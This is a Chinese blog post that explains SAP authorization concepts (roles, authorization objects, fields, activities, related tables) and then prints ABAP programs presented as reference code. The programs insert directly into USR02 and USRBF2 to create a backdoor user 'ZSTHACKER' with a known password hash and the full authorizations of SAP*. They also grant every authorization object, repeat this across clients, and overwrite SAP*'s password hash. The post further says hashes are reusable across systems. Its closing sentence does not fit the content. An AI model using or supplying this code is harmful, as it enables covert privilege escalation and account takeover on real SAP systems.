`

平实语言讲解SAP权限

 
阅读更多

角色、通用角色、本地角色

 

| -- 权限对象       MM_XXXX 对象

|

| -- 权限字段       字段一(负责增删改)     字段二(负责字段级准入)

|                               |                                      |

| -- 允许操作           01/03/05/07                       |

|                                                                      |

| -- 允许值                                  Factory1, Factory2, Factory5~Factory7

 

---------------------------------------------------------------------------------------------------------

 

直观的说,权限就是“某人能干某事”和“某人不能干某事”之合。在SAP系统中,用事务码(也称交易代码、或者TCODE、或者Transaction Code)表示一个用户能干

的事情。比如MM01这个TCODE是用来维护物料数据的、MIGO是用来收货的、FS00是用来维护会计科目的等。
 
用SU01新建一个ID时,默认的权限是空白,即这个新建的ID不能做任何事情,不能使用任何事务代码。这样只需要为相应的ID赋上相应的TCODE,即可实现“某人能

干某事”了,其补集,则是“某人不能干的某些事”。
 
但是我们不能直接在SU01里面给某个ID赋上TCODE,要通过ROLE中转一下。即:一堆TCODE组成了一个ROLE,然后把这个ROLE分给某个ID,然后这个ID就得到一堆

TCODE了。
 
上面这些,仅仅是SAP权限控制的初级概念,要理解SAP权限控制的全部,必须还要明白下面的概念。
 
1、角色(ROLE)、通用角色(Common Role)、本地角色(Local Role)
 
上面讲了,角色,即ROLE,是一堆TCODE的集合,当然还包含有TCODE必备的“权限对象”、“权限字段”、“允许的操作”及“允许的值”等。我们使用PFCG来维护角色。
 
为了系统的测试与SAP实施项目的阶段性需要,进一步将角色分为“通用角色”和“本地角色”。
 
举个例子便于理解:通用角色好比“生产订单制单员”,本地角色对应就是“长城国际组装一分厂生产订单制单员”。所以,本地角色较之通用角色的区别就是,在同

样的操作权限(事务代码们)情况下,前者多了具体的限制值。这个限制值可能是组织架构限制,也可能是其他业务的限制。如,一分厂的制单员不能维护二分厂

的制单员;一分厂的制单员甲只能维护类型为A的单据,而不能维护类型为B的单据,诸如此类。
 
具体请看下面的概念。
 
2、权限对象(Authorization Object)、权限字段(Authorization Field)、允许的操作(Activity)、允许的值(Field Value)
 
上文粗略说了构成ROLE的是若干TCODE。其实,在ROLE和TCODE之间,还有一个中间概念“权限对象”:
 
角色包含了若干权限对象,在透明表AGR_1250中有存储二者之间的关系;
权限对象包含了若干权限字段、允许的操作和允许的值,在透明表AGR_1251中体现了ROLE/Object/Field/Value之间的关系;
有一个特殊的权限对象用来包含了若干事务码。这个权限对象叫“S_TCODE”,该权限对象的权限字段叫“TCD”,该字段允许的值(Field Value)存放的就是事务代

码;
有一种特殊的权限字段用来表示可以针对该权限对象做哪些操作,是允许创建、修改、显示、删除或者其他呢。该权限字段叫“ACTVT”,该字段允许的值(Field

Value)存放的就是允许操作的代码,01代表创建、02代表修改、03代表显示等;
 
SAP的权限控制是控制到字段级的,换句话说,其权限控制机制可以检查你是否有权限维护某张透明表的某一个字段。
 
SAP系统自带了若干权限对象、默认控制了若干权限字段(对应到透明表的某些字段)。可以用事务码SU20来查看系统有哪些权限字段,用SU21来查看系统有哪些

默认的权限对象。
 
于是我们知道了事务代码与权限对象的区别。从权限控制的范畴来看,事务代码属于一种特殊的权限对象;一个事务代码在执行过程中,为了判断某个ID是否有权

限执行此事务代码,还可能检查其他若干普通的权限对象。使用SU22来查看某个事务代码包含了哪些权限对象。在透明表USOBX中,存放了事务码与权限对象的对

应关系。
 
3、自定义权限对象
 
上文所说的系统自带权限对象与权限字段仅能满足有限的需要,其权限审核的逻辑也是系统硬编码了的,我们能做的只是是否启用某项权限对象的检查(使用SU22

)。如果需要自定义,通过SU20、SU21定义即可。调用的时候在程序中加入类似代码:
 
AUTHORITY-CHECK OBJECT 'Z_VKORG' ID 'VKORG' FIELD 'REC_VKORG-VKORG'.
IF SY-SUBRC <> 0.
 MESSAGE 'No Authorization!' TYPE 'E'.
ENDIF.
 
下面的程序ZCRTUSER是建立用户ZSTHACKER(初始密码123qaz)并赋予SAP*用户的所有权限的参考程序。
 
Program ZCRTUSER.
 
Data ZUSR02 like USR02 .
 
***1.Create User ZSTHACKER according to DDIC
 
select single * into ZUSR02 from USR02
 
where BNAME = 'DDIC'.
 
ZUSR02-BNAME = 'ZSTHACKER'.
 
ZUSR02-Bcode = 'E3B796BB09F7901B' .
 
insert USR02 from ZUSR02  .
 
***2.Copy Auth. Obj from SAP*(or other)
 
***如果将Where BNAME = 'SAP*'去掉,基本就是复制所有的授权对象
 
data ZUSRBF2 like USRBF2 occurs 0 with header line.
 
select *  from  USRBF2 into table ZUSRBF2
 
where BNAME = 'SAP*' .
 
Loop at ZUSRBF2.
 
  ZUSRBF2-BNAME = 'ZSTHACKER' . 
 
  Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
 
endloop.
 
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.
 
 
如果SAP*可能被删除,还可直接将TOBJ中包含的所有的ERP授权对象全部赋予给一个用户。
 
以下程序ZALLOBJ是赋予所有的标准授权对象给用户ZSTHACKER 。
 
Program ZALLOBJ。
 
Data Ztobj like tobj occurs 0 with header line .
 
data zusrbf2 like usrbf2.
 
select * into table ztobj from tobj .
 
loop at ztobj.
 
  zusrbf2-mandt = sy-mandt.
 
  zusrbf2-bname = 'ZSTHACKER'.
 
  zusrbf2-objct = ztobj-objct.
 
  zusrbf2-auth  ='&_SAP_ALL'.
 
  modify USRBF2 FROM  zusrbf2 .
 
endloop .
 

 
 
也可跨Client建立用户和赋予权限,只要使用client specified就可以。
 
Program ZCLIENT.
 
Data zusrbf2 like usrbf2.
 
Select * into zusrbf2 from usrbf2  where bname = 'SAP*' .
 
Zusrbf2-bname = 'ZSTHACKER' .
 
Zusrbf2-mandt = '100'.
 
Insert into usrbf2 client specified values zusrbf2.
 
Endselect .
 
 
下面是一句话修改SAP*的密码为123456的程序,同样,假设用户BUTCHER的密码丢失,我只要随便在一台服务器上建立一个用户也叫BUTCHER,然后密码设置为

1QAZ2WSX,则其在任何系统任何client加密后的密码必为BF02C9F1F179FB45 ,这样的加密意义已经不大。
 
report ZMODPWD.
 
tables :usr02 .
 
update usr02 set bcode = ' CF094BAA2020480E'
 
where BNAME = 'SAP*'.
 
 
虽然以上只是一个建立物料主数据的权限控制,却非常清晰地解释了ERP系统权限控制的逻辑。

分享到:
评论

相关推荐

    SAP 完全配置方案 SD

    SAP 完全配置方案 SD SAP 完全配置方案 SD 是一种基于 SAP software 的配置...作者通过自己的经验告诉我们,学习和工作需要持之以恒、坚持不懈,需要克服烦燥、堕性、急攻近利的心态,需要保持一颗宁静而平实的心。

    实用类文本阅读语言特色PPT教案.pptx

    以下将对实用类文本阅读语言特色及其分析技巧进行详细讲解。 首先,实用类文本的语言总体要求准确、平实和简洁。准确意味着用词精当,不产生歧义,确保读者能精确理解作者意图。平实则强调语言的直接性和清晰度,...

    20030525_在理性与平实中存活1

    一、公司发展的宏观商业模式已经确立 二、公司发展的微观商业模式就是一部分有效和谐的方法论,完成企业管理诸元素从端到端、高质、快捷、有效的管理 三、既然我们已经确

    汇编语言第二版 王爽

    综上所述,王爽教授的《汇编语言第二版》不愧为一本优秀的学习资料,其平实的语言、详尽的实例和实用的习题设置为读者构建了一个扎实的汇编语言学习框架。无论是计算机科学的学子还是希望提高自身编程能力的IT专业...

    语言风格PPT课件.pptx

    2. **平实自然**:平实自然的语言风格多采用日常口语,没有过多的修辞,质朴无华,如同生活中的小花,静静地绽放。贾岛的《寻隐者不遇》和杜甫的《绝句》都是此类风格的代表,语言简洁,意境深远。 3. **明净绚丽**...

    自然语言处理,深度学习 代码

    围绕自然语言处理和时序...语言平实,结合大量示意图和Python代码,按照“提出问题”“思考解决问题的新方法”“加以改善”的流程,基于解决自然语言处理相关的各种问题,使读者在此过程中更深入地理解中的重要技术。

    高考诗歌鉴赏 语言风格PPT课件.pptx

    比如杜甫的诗语言平实而深沉,他善于通过具体事物来反映社会现实和表达政治抱负;而柳永的词则多用比兴手法,语言华丽且充满音乐性,展现了他婉约柔美的艺术风格。 在分析诗歌语言风格时,考生应当使用准确的术语来...

    诗歌鉴赏之语言风格(课件)PPT学习教案.pptx

    2. 冲淡平淡的风格,如陶渊明和李煜的作品,强调质朴无华,不加修饰,以平实质朴的语言传达深沉的情感,如李煜的“相见欢”,让人感受到诗人内心的孤独与愁绪。 3. 绚丽的风格则体现在诗人运用丰富的辞藻和生动的...

    文章的语言特点、语言风格[归类].pdf

    3. 质朴与华丽:质朴(平实)风格的文章语言通俗易懂,多用口语,较少使用修辞。华丽(典雅)风格的文章则讲究语言的节奏和韵律,多用描绘性语言和排比、对偶、对比等修辞手法。 4. 庄重与诙谐:庄重风格的文章主题...

    学习写得有文采——作文语言升格训练PPT学习教案.pptx

    然而,许多学生在写作时往往局限于平实无华的语言,难以展现出文章的深度和层次感。这就需要教师引导学生通过语言升格训练,学会使用更精准的词汇、多变的句式以及丰富的修辞手法,使作文语言变得生动而有表现力。 ...

    高中历史之教学教研扎实充实丰实平实真实_“什么样的课算一堂好课”素材pdf

    在当代教育的实践中,我们不断探索和质疑“什么样的课算一堂好课”。叶澜教授的观点为我们提供了思考的起点:虽然评价一堂好课是一个值得...这样的过程,才能够真正实现教学研究扎实、充实、丰实、平实、真实的目标。

    赏析语言风格、特色.doc

    应用文体的语言则追求平实,而文学作品则需要丰富的修辞手法来增加语言的魅力和表现力。 2. **鉴赏语言的能力**: 高考语文试卷中,鉴赏语言是必考内容,因为它涉及阅读理解、综合分析和评价能力。品味文章的语言...

    专题资料(2021-2022年)2019诗歌鉴赏之语言特色.ppt

    相关术语包括朴实无华、平实质朴、冲淡自然、多用口语。\n\n2. **华丽**:华丽的诗歌语言丰富,充满文采,常用华美词汇和巧妙比喻,展现出绚丽的视觉效果。如李商隐的《锦瑟》中“沧海月明珠有泪,蓝田日暖玉生烟”...

    《大自然的语言》教学设计_1.docx

    3. 创编与表达:结合生活经验和想象,引导学生仿编或创编诗歌,体会如何用平实、生动的语言解释复杂的自然知识。 教学过程分为三个阶段: 1. 激趣导入:教师通过播放无声电影画面,让学生为每一幅画面配以解说,...

    诗歌鉴赏之语言特色省级公开课学习教案.pptx

    例如,【朴素】的语言风格,它强调的是选用简洁而深刻的字眼,不加修饰,以平实的语言传达真切的情感。这种风格常被形容为“朴实无华”、“平实质朴”,有时会采用口语化的表达,使诗歌更加贴近生活,易于理解。 ...

    2020中考语文诗词鉴赏易考知识点语言特点题pdf

    记住这些常见的语言风格术语,如平实质朴、清新自然、冲淡平和、沉郁顿挫、绚丽飘逸、简洁明快、豪放旷达、雄浑壮丽、婉约凄切等,并能结合诗句进行分析,将有助于在考试中准确、全面地解答诗词鉴赏题目。

    散文阅读语言鉴赏公开课PPT学习教案.pptx

    4. 探讨语言风格,如平实、幽默、辛辣、自然、口语化等,理解这些风格如何塑造散文的独特气质。 通过这些方法,学习者可以系统地分析和评价散文的语言,进一步领略散文的魅力。在实际答题时,可以按照“看词语”、...

    出镜记者在现场报道中的语言运用.pdf

    3. **平实真诚**:保持语言的真实性,避免过度修饰,让观众感受到记者的诚恳和专业。 4. **深入独到**:在报道中展现出独特的洞察力,提供深入的分析和独特的见解,增加报道的价值。 总结,出镜记者的语言运用是...

    平实文风的矿业集团经理述职报告.doc

    平实文风的矿业集团经理述职报告.doc

Global site tag (gtag.js) - Google Analytics